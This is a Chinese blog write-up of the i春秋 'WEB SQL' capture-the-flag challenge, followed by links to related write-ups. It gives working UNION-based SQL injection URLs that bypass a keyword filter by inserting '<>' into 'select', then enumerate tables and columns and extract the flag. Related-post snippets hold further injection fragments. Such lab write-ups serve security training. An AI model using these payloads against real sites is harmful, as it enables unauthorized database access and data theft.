i春秋 WEB SQL

最新推荐文章于 2022-03-28 22:22:47 发布
最新推荐文章于 2022-03-28 22:22:47 发布
阅读量845 收藏 1
点赞数
分类专栏: CTF题 一天一道CTF i春秋CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/93062264
版权
CTF题 同时被 3 个专栏收录
115 篇文章 15 订阅
订阅专栏
一天一道CTF
52 篇文章 6 订阅
订阅专栏
i春秋CTF
21 篇文章 2 订阅
订阅专栏

i春秋 WEB SQL

一天一道CTF题目,能多不能少

打开网页,发现有个id参数,而且有提示:
在这里插入图片描述
查看网页源代码,发现有sql语句显示:
在这里插入图片描述
直接抓包,发现and,or,order好像被过滤了,
使用/**/,发现还是不行:
在这里插入图片描述
经过尝试发现,可以使用<>绕过关键字过滤
经过尝试,得到有三个字段:
在这里插入图片描述
使用union查询,发现select也被过滤掉了,同理使用<>
发现2的位置会有回显:
在这里插入图片描述
这就好办了,直接查询数据库:/index.php?id=1+union+s<>elect+1,database(),3
得到数据库:sqli
在这里插入图片描述
继续爆表名:/index.php?id=1+union+s<>elect+1,(sel<>ect%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3
得到两个表名:info,users
在这里插入图片描述
猜测在users中,,,
继续爆列名:/index.php?id=1+union+s<>elect+1,(sel<>ect%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name="users"),3
得到:id,username,flag_9c861b688330
在这里插入图片描述
感觉就在flag_9c861b688330里面:
继续:/index.php?id=1+union+s<>elect+1,(sel<>ect%20group_concat(flag_9c861b688330)%20from%20users),3
发现是空的,,,,,:
在这里插入图片描述
怀疑是不是找错表了,重来:/index.php?id=1+union+s<>elect+1,(sel<>ect%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name="info"),3
果然 还有一个flag的东西:id,title,flAg_T5ZNdrm
在这里插入图片描述
既然如此就查吧:/index.php?id=1+union+s<>elect+1,(se<>lect%20group_concat(flAg_T5ZNdrm)%20from%20info),3
得到flag:flag{fc21fcbe-7afa-4b4b-9bad-e95a8fc728c4}
在这里插入图片描述
主要就是过滤关键字的问题,要知道如何进行绕过,
一般把各种方法都尝试一下,你就会收获道不一样的惊喜,
这里就不说那些绕过的方法了,网上一大把
想知道的可以自己去百度一下

A_dmins
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ichunqiu Web SQli wp
weixin_45253216的博客
01-11 230
2020.1.10 菜鸡今天又来水题了。 其实这个题,不是很水【狗头】在i春秋平台上看到了一道名为SQli的web题,想到了自己玩过1%的那个靶场也叫sqli-libs,于是手贱的打开了。咋一看还蛮友善的,其实涉及的知识点还蛮多的(自我感觉,毕竟不会的太多了) 本题涉及的知识有: waf fuzz测试 sqli注入fuzz字典 spintf()函数格式化字符串,导致单引号逃逸 实践判断sql注入点 sqlmap多参数使用 编写利用脚本 如果还有相关知识再做补充,下面开始本题wp。 首先进入题目环境,是一
i 春秋 CTF训练营 web——SQL注入 1(字符型注入)(手动注入)
AAAAAAAAAAAA66的博客
11-30 2525
这道题可以直接使用sqlmap 直接跑出。 下文介绍的是手注: 本文用到了搜狐插件hackbar,(使用效果与直接在url栏输入参数相同) 题目(得知是注入题) 判断是否为数字型 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1=1 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1.
i春秋CTF训练 Web SQL
椰奶冻不安全的博客
06-27 451
Web SQL 题目内容:出题人就告诉你这是个注入,有种别走! 链接需到ichunqiu网站申请 xxx.changame.ichunqiu.com/index.php?id=1 xxx.changame.ichunqiu.com/index.php?id=1=1 xxx.changame.ichunqiu.com/index.php?id=1=2 1=1时正常访问,1=2时页面为空白,为数字型注入 xxx.changame.ichunqiu.com/index.php?id=1 order b
i春秋web
qq_58091216的博客
03-28 4158
3.21 1.题目名称:常见的搜集 题目内容:一共3部分flag 敏感文件 解题思路:用dirsearch扫描网站 ,发现三个文件robots.txt,index.php~ ,.index.php.swp, dirsearch -u http://eci-2zegi8jh6a7iw18p2ptc.cloudeci1.ichunqiu.com/ 我们依次访问就可以得到flag 2.题目名称:粗心的小李...
i春秋SQL(详细WP)
金 帛的博客
02-22 1518
i春秋webWP
webSql/LocalStorage
04-19
使用webSql,LocalStorage作为数据存储,实现数据的增删改查
jquery+easyui+websql.rar
04-19
使用jquery+easyui框架,采用前端数据库websql/LocalStroage作为数据存储,实现增删改查
WebSql 学习实例
11-03
WebSql 学习实例
vue+element-ui+websql
04-19
使用vue+elemetnui框架,采用websql/localsotrage作为数据存储,实现增删改查
sql.zip_web sql_web登录
09-21
自己做的web登录程序 连接数据库。。。。。
Web-SQLi[i春秋][200pt]
Laurel_60的博客
08-04 1345
打开网址,是个登陆界面。 根据题目,第一反应–怕不是sql注入哦!经过尝试之后会发现,username=admin时,返回的是password error。ok,日常抓包,然后用intruder看看有没有字符被过滤掉。 事实证明,这个%有着大大的问题。拜读了网上的各种wp之后,原来是spintf()函数格式化字符串,导致了单引号逃逸。通过构造- - username=admin%1$\'...
i春秋web-SQL(基础绕过注入)
Sea_Sand息禅
05-21 742
很简单的一道注入,没有任何闭合,直接就是个整数的注入 id=1 order by 1 报错:inj code! 对order进行处理 1)id=1 or<>der by 1 报错:inj code! 2)id=1 ord<>er by 1 页面正常 id=-1 union sel<>ect 1,2,3 页面显示2,说明作用...
i 春秋 web 题 <include>
慢慢变小佬的博客
08-22 1989
打开链接地址:http://454e308408314446b0961f6226b502e7ad8cd9afd5614658.game.ichunqiu.com/ 题题目中以给出提示,这是文件包含题,打开题目链接后出现: 代码中包含一个phpinfo.php文件,试着去打开这个文件,什么也没有发现。而且可以发现改代码是没有防护的文件包含。 既然是关于php的,可以使用php协议 在该链接下...
i春秋 who are you
g1ut_t0ny的博客
07-03 186
who are you 1、打开题目发现就这一句话,啥也没有,源码也是 2、那就抓包吧 3、发现一个奇奇怪怪的东西,base64一下 4、emmmmmmmmm这是什么玩意,不过隐隐觉得他肯定代表着一种身份,既然开局就说了权限不够,那肯定不是admin,5个字符权限不够那就guest?(有时候玄学就是这么简单),但是这是哪种东西转换过来的呢,柴犬屁股一沉发现事情并不简单 5、好了原来是Rot13加密。原理:回转13位,一种简易的置换暗码。ROT13也是过去在古罗马开发的凯撒加密的一种变体。ROT13是
i春秋WEB CTF 2
cbhjerry的博客
11-16 2743
题6:SQL,出题人就告诉你这是个注入,有种别走! 解题:这是一个存在sql注入漏洞的题目, 通过手工测试发现程序对"SELECT","ORDER"进行了识别,即判断为注入行为,虽然对"AND"不进行识别,但如果其后面有"="同样认定为注入行为。同时发现了对"&lt;&gt;"进行了过滤,因此可将以上3个关键字换成"SELEC&lt;&gt;T",&quo
i春秋SQL
weixin_44722125的博客
05-21 462
看几列 http://ffe4385f12ad428598cb9253dca3c3c0e664b023f3c64632.changame.ichunqiu.com/index.php?id=1 union sele<>ct 1,2,3--+ 爆数据库 http://ffe4385f12ad428598cb9253dca3c3c0e664b023f3c64632.changame.ic...
i春秋 WEB Login
A_dmin的博客
06-13 1298
i春秋 WEB Login 一天一道CTF题目,能多不能少 打开网页,发现登录,查看源代码,发现疑似账号密码的东西~: 登录,发现什么都没有,源码也没有什么~: 既然如此就抓包吧,bp启动: 发现一个奇怪的东西——show??: 那就把这个值变成1看看有没有什么变化: 得到源码: 源码如下: <!-- <?php include 'common.php'; $requset...
i春秋 2020新春战“疫”大赛(web部分)
qq_42812036的博客
02-25 788
ezupload 上传一句话,蚁剑直连,bash直接cat /flag,说没权限折腾了下Linux提权,大马提权。 payload: cd / cat /readflag : ( 简单的招聘系统 payload admin' or 1# 进入admin,成功访问招聘界面blank page界面 key处存在sql注入 有5个字段,显位在2 可以猜测后端查询语句可能类似: selec...
i春秋 WEB 123
A_dmin的博客
06-14 969
i春秋 WEB 123 一天一道CTF题目,能多不能少 打开网页一个登录框,按照惯例查看网页源代码,有所发现: 查看user.php,发现存在但是什么都没有,检查是否存在备份文件~ 发现存在: 下载打开,bp抓包,当做字典进行爆破: 先构造: 最后加入字典进行爆破,年份不对可以一直加,或者减,,,,,总之,暴力就对了 最后得到用户名和密码: zhangyuzhen zhangyuzhen19...
ctfshow web sql
最新发布
08-23
根据引用和引用所提供的信息,可以看出ctfshow是一个与web相关的CTF竞赛,并且有与之相关的web175和web172题目。而引用则提供了一个涉及到SQL注入的链接。根据链接中的内容,可以推测这个链接是利用了SQL注入漏洞来获取数据库中的密码信息并将其写入到指定文件中。因此,可以得出结论,ctfshow web sql竞赛是一个围绕web安全中的SQL注入漏洞进行的CTF竞赛。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ctfshow笔记WEBsqlSQL)](https://blog.csdn.net/m0_46625346/article/details/119332170)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值